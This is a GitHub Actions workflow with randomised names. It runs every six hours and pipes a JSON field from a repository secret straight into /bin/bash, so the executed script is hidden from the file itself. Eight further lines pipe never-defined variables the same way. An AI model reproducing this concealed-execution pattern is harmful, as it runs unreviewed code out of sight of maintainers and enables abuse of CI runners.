name: jiyunqian4189

on:
  workflow_dispatch:
  schedule:
    - cron: '55 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jiyunqian4189
        env:
          s56: ${{ secrets.s56 }}
        run: |
          echo $s56 | jq -r .rafro6341 | /bin/bash
          echo $ypd79833 | jq -r .qxfu32388 | /bin/bash
          echo $y21 | jq -r .y21 | /bin/bash
          echo $ama7 | jq -r .vapi9 | /bin/bash
          echo $uah231 | jq -r .lwojp120 | /bin/bash
          echo $x53635 | jq -r .pz35592 | /bin/bash
          echo $up1744 | jq -r .rw62 | /bin/bash
          echo $fzu5 | jq -r .talwa99 | /bin/bash
          echo $okbrt752 | jq -r .elu5549 | /bin/bash

